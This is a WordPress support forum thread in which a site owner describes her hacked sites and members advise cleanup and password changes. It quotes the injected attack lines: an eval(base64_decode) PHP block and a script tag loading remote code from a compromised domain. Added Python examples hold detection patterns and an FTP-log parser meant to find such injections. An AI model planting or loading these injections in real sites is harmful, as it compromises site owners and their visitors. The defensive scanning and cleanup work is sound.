All my websites hacked 'silence is golden'? (24 posts)

  1. talia
    Member
    Posted 1 month ago #

    I've had all my websites hacked. I'm restoring a backup from a week ago, but I'm not really sure what has caused it or if there is any way of tracking how it happened. I will find someone to help me harden up the files for future protection, but I would like to sort it.

    PLUGIN QUERY???
    The only new plugin I've added is the si-contact-form, which seems to have good ratings, so I don't imagine it's the cause. But maybe... as it's the only new plugin in the time that this happened. However, as it spread to other websites, I'm unsure.

    SILENCE IS GOLDEN???
    I noticed this in an index.php file

    at the end it says Silence is golden
    does anyone know if it's a specific hack?

    I've had my wordpress files hacked, plus some other php files in other directories.

    <?php eval(base64_decode('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')); ?><?php
    // Silence is golden.
    ?>
  2. iridiax
    Member
    Posted 1 month ago #

    The eval(base64_decode stuff is a hack.

  3. talia
    Member
    Posted 1 month ago #

    OK, I guessed it must be. Thanks for the input. I just wish I knew where it came from.

    If I delete that part will it fix things? I managed to fix my basic (non wordpress) files by deleting that part of the code. But WP has more files and that code is probably in more places.

    Any tips on how to get rid of it? I tried restoring my backup from a week ago but it doesn't seem to be working. It's weird as I only noticed the problem 3 days ago so I thought the backup from a week ago would be good.

  4. talia
    Member
    Posted 1 month ago #

    I've worked out which files to remove the eval(base64_decode code from and it seems to be working.

    How likely is it that I'll be hacked again soon? My tech person says she can't look at it for 2 weeks to "harden" up the files. I'm wondering if I should hire someone else???

  5. iridiax
    Member
    Posted 1 month ago #

  6. talia
    Member
    Posted 1 month ago #

    Excellent, thanks for that.

  7. talia
    Member
    Posted 1 month ago #

    The guys at blue host suggest changing the names of the scripts from php to html to make it harder for the hackers. Any thoughts on this idea?

    My sites have already been hacked again. Very frustrating. I'm not very techie, so it's taking me a while to make the changes they suggest.

  8. talia
    Member
    Posted 1 month ago #

    Lots of questions! If anyone can help I'd appreciate it

    I've read the instructions on restoring the files and I'm good to go, however I'm wondering how to handle the issue of multiple websites.

    I host with bluehost, and have multiple domains. Some wordpress, some aren't but most are php based. They are all on the same ftp account. If I put a fresh site on there with the latest version of WP, will the hackers still be able to hack that, because they still have back door access to the other php files on the system?

    i.e. can I progressively restore one domain at a time, or will they get hacked if I do that? Do I need instead to clear out all the php based domains?

    Also, I see that images aren't usually hacked. What about pdf or mp3 files that I have online?

    Will my html files in other domains be okay? They don't seem to have been hacked even though they're on the same ftp account.

    Thanks!

  9. talia
    Member
    Posted 1 month ago #

    Does anyone know if I need to remove all the websites at the same time, or can I progressively remove, clean and then replace with the latest WP?

  10. jonimueller
    Member
    Posted 1 month ago #

    You definitely should change your web hosting account passwords. And this won't help you now, but for future, you should install several plugins such as vLogger and WP Exploit Scanner:

    http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/

    http://ocaoimh.ie/exploit-scanner/

  11. iridiax
    Member
    Posted 1 month ago #

    "They are all on the same ftp account."

    Be sure to change all passwords, including ftp/webhost ones. After backing up, I would do a major cleanout of all hacked sites and change all passwords so that the source of the infection is eliminated. You don't want to have to clean up hacked sites over and over. Also see: http://codex.wordpress.org/Hardening_WordPress

  12. webcraftsman
    Member
    Posted 1 month ago #

    Is there some vulnerability that is allowing hackers to gain access to WP 2.8.4? I was hacked over the weekend. I am doing the delete files off the server and reupload to clean my system as well as change passwords.

    Anyone notice an increase in hacks with updated software?

  13. talia
    Member
    Posted 1 month ago #

    "You don't want to have to clean up hacked sites over and over."

    Yes that was my fear. So if I understand you correctly I need to install the latest version of WP on ALL websites at the same time, or it will be able to hack into WP 2.8.4?

    Is this domain reference http://ez-paintinginc.com anything to do with the hack? It seems to be on some of my html websites, but I can't think how that reference got there. It appears to link to some sort of script and I am not sure if it's another form of hack or something legit. I can't find anything on it in Google.

  14. talia
    Member
    Posted 1 month ago #

    Thanks jonimueller and iridiax for the links :)

  15. talia
    Member
    Posted 1 month ago #

    Does anyone know if http://ez-paintinginc.com is a hack or legitimate?

  16. iridiax
    Member
    Posted 1 month ago #

    That site is apparently hacked as well. Hackers can host their scripts/files on hacked sites and then link to them on other hacked sites.

  17. talia
    Member
    Posted 1 month ago #

    Ahhh! Thanks, that explains why the ez-painting site was blank.

    It seems like the hackers have got into my html files and inserted scripts hosted at http://ez-paintinginc.com, so the problem is bigger than I thought. I've deleted some of my websites, but I haven't replaced them with new sites yet or restored wordpress. Getting there slowly.

  18. neo721x
    Member
    Posted 1 month ago #

    There seems to be major hacking over a wide range of WP blogs. I think there's something the WP guys aren't telling us. A bit of info wouldn't go astray...

  19. bh_WP_fan
    Member
    Posted 1 month ago #

    neo721x: All the changes between releases are listed in the change logs. See if you can find any security updates between 1.8.4 and 1.8.5 and you'll have an idea if there were any security issues they were aware of and fixed.

    As to hacking, it is becoming more common all over the place, not just with WordPress. These hacks are happening everywhere. Go check out Joomla, or any other php/database-driven software. Hackers are always finding new ways to hack websites.

  20. talia
    Member
    Posted 1 month ago #

    Someone told me there is a way I can find the IP address of the hacker and block it. Anyone know how? And is it worth doing it? I figure they probably have rotating IP addresses anyway.

    This keeps finding its way onto my html pages:
    <script src=http://ez-paintinginc.com/lindy/index.php ></script>

    I hope visitors to my site aren't getting some sort of trojan or something happening to their computers.
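    As an added example (not code from this thread or from WordPress), here is a small scanner for the two injection markers the thread reports: the eval(base64_decode(...)) block prepended to PHP files in the first post, and the remote <script src=http://.../index.php></script> tag that keeps reappearing in the html pages above. The comment "Silence is golden." on its own is WordPress's normal empty index.php, so only the eval in front of it is treated as a hit; the files scanned below are constructed in a temp directory with a placeholder domain, and any match still needs to be diffed against a known-clean copy before deciding what to remove.

```python
import os
import re
import tempfile

# Signatures for the two injections reported in this thread: an
# eval(base64_decode(...)) block prepended to PHP files, and a remote
# <script src=...index.php></script> tag dropped into html pages.
INJECTION_PATTERNS = {
    "php-eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "html-remote-script": re.compile(
        r"<script\s+src\s*=\s*[\"']?https?://[^\s\"'>]+\.php[\"']?\s*>\s*</script>", re.I),
}

def scan_file(path):
    """Return the names of every signature found in one file."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    except OSError:
        return []
    return [name for name, rx in INJECTION_PATTERNS.items() if rx.search(data)]

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root; map each matching file (relative path) to its signatures."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                full = os.path.join(dirpath, fn)
                found = scan_file(full)
                if found:
                    hits[os.path.relpath(full, root)] = found
    return hits

def build_sample_root():
    """Constructed sample web root (placeholder content, not real site files)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "wp-content/index.php": "<?php eval(base64_decode('QUJDRA==')); ?><?php\n// Silence is golden.\n?>\n",
        "wp-content/plugins/hello.php": "<?php\n// Silence is golden.\n?>\n",  # clean: the marker alone is normal
        "about.html": "<html><body><script src=http://example.invalid/lindy/index.php ></script></body></html>\n",
        "logo.png": "binary placeholder, not scanned\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for path, sigs in sorted(scan_tree(build_sample_root()).items()):
        print(f"{path}: {', '.join(sigs)}")
```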

  21. talia
    Member
    Posted 1 month ago #

    I found a log file for http://ftp.mydomain.com

    It says it has been accessed by IP 216.97.230.50, which whois shows as being hosting company LunarPages. They are not my hosting company, so there is no reason why anyone from there should be accessing my ftp account.

    OrgName: Lunar Pages
    OrgID: ACIDL
    Address: 100 East La Habra Blvd.
    City: La Habra
    StateProv: CA
    PostalCode: 90631
    Country: US

    Here is a sample from the log

    Fri Oct 23 15:50:34 2009 0 216.97.230.50 2029 /home2/mydomain/public_html/folder/wp-content/plugins/hello.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 5663 /home2/mydomain/public_html/folder/wp-content/plugins/sidebarLogin.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 30316 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 30401 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 125339 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:36 2009 0 216.97.230.50 125424 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:36 2009 0 216.97.230.50 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1

    Could this be my hacker and is it safe to ban that IP? Any help appreciated

    Thanks :-)
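    As an added example (not from the thread), here is how a defender would read that log sample: it is xferlog format, where the field after the transfer type (a) and action flag (_) is the direction, 'o' for a file sent out by the server (a download) and 'i' for one received (an upload), and the quoted lines show each file being downloaded and then uploaded back larger (the three js files each grow by exactly 85 bytes), which is what in-place injection over FTP looks like. The script below parses constructed lines in that format (documentation-range placeholder addresses, not the IP from the post) and flags uploads from outside a trusted network plus files that came back bigger than they were downloaded.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed xferlog sample modelled on the lines quoted above; host addresses
# are documentation-range placeholders, not the IP from the post.
SAMPLE_XFERLOG = """\
Fri Oct 23 15:50:34 2009 0 203.0.113.7 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 203.0.113.7 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 203.0.113.7 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 203.0.113.7 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
Sat Oct 24 09:12:01 2009 1 192.0.2.10 4096 /home2/mydomain/public_html/logo.png b _ i r mydomain ftp 1 * c
Sat Oct 24 09:12:02 2009 0 192.0.2.10 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1
"""

@dataclass
class Transfer:
    when: str
    host: str
    size: int
    path: str
    direction: str  # 'o' = sent out by the server (download), 'i' = received (upload)
    user: str

def parse_xferlog(text):
    """Fields: 5 date tokens, xfer seconds, host, size, path, type, action, direction, mode, user, ..."""
    out = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14:
            continue  # no direction/user field present (garbled line)
        out.append(Transfer(" ".join(f[:5]), f[6], int(f[7]), f[8], f[11], f[13]))
    return out

def suspicious_transfers(transfers, trusted_nets):
    """Flag uploads from outside trusted_nets, and files uploaded back larger than
    they were downloaded (the download-then-upload pattern of in-place injection)."""
    nets = [ip_network(n) for n in trusted_nets]
    findings, last_download = [], {}
    for t in transfers:
        untrusted = not any(ip_address(t.host) in n for n in nets)
        if t.direction == "o":
            last_download[(t.host, t.path)] = t.size
        elif t.direction == "i":
            if untrusted:
                findings.append(("upload-from-untrusted-host", t.host, t.path))
            prev = last_download.get((t.host, t.path))
            if prev is not None and t.size > prev:
                findings.append(("file-grew-after-download", t.host, t.path))
    return findings
```

    Blocking one address only helps until the next one; the findings here are for deciding which files to restore from a clean copy and for confirming whether the FTP credentials themselves need rotating.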

  22. talia
    Member
    Posted 1 month ago #

    P.S. The strange thing is that I've been in on the ftp account, but my IP address doesn't show in the log.

  23. bh_WP_fan
    Member
    Posted 1 month ago #

    If you don't know the IP address, I'd say to block it, as you can always remove it later if need be, though I don't think the blocking tools you have will be enough to keep them out of FTP if they are getting in with proper authentication methods. I'd suggest changing your password for cPanel, your blogs, your email addresses, and anything else you have which has a password. Also, look over some of the following:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://helpdesk.bluehost.com/index.php/kb/article/000511

  24. talia
    Member
    Posted 1 month ago #

    Thanks

    I did block the IP, but this morning I found no evidence anyone had been in the ftp account according to the access logs, yet this

    <script src=http://ez-paintinginc.com/lindy/index.php ></script>

    has been inserted back into the html file

    I don't really understand a lot of the technical stuff. I'm just doing what I can until my tech person is available to work on it. Hopefully she'll know how to set up the .htaccess file and other things to help protect my site.
